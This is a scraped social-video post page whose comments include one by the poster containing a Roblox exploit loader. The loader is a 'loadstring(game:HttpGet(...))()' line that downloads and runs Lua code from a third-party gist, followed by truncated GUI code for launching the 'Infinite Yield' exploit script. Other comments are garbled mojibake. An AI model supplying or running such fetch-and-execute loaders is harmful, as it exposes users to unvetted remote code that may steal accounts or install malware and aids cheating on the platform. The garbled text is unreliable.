Play in App
Play in App
iOS
Android
romav
Follow
603
6
4 Comments
Next up
kukuna
74w
Ezzzzzzzz
Reply
romav
75w
π€πΏππ©Έππ«Έπ«·π‘--------------π
Reply
romav
75w
π«‘π€
Reply
romav
75w
GEFGEFGEFGEFGEFGEFGEFGEFGEFGEFGEFGEFGEFa3ddb803b3dda1cc163452491bbed4e8loadstring(game:HttpGet("https://gist.githubusercontent.com/b00jkidd/aba363525d2f778372537da683fc5c64/raw/da7cb356bbc99858b4ae072ee2aaf5bcd22976a1/b00jkidd%2520hub"))()-- Create a ScreenGui local screenGui = Instance.new("ScreenGui") screenGui.Name = "InfiniteYieldGUI" screenGui.Parent = game.Players.LocalPlayer.PlayerGui -- Create a TextButton for executing the script local executeButton = Instance.new("TextButton") executeButton.Name = "ExecuteButton" executeButton.Text = "Execute Infinite Yield" executeButton.Size = UDim2.new(0, 200, 0, 50) executeButton.Position = UDim2.new(0.5, -100, 0.5, -25) executeButton.AnchorPoint = Vector2.new(0.5, 0.5) executeButton.BackgroundColor3 = Color3.fromRGB(255, 0, 0) -- Red background executeButton.TextColor3 = Color3.fromRGB(255, 255, 255) -- White text executeButton.Draggable = true -- Make it movable executeButton.Parent = screenGui -- Execute Infinite Yield when the butto
Reply
Comment in the App